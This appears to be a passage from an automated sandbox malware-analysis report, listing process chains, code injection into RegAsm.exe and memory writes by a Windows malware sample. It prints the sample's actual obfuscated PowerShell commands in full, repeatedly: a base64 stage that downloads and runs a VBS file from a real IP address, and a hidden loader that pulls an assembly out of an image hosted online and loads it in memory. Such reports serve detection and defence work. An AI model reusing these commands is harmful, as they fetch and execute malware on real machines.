                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe28_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00419662 mouse_event,28_2_00419662
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
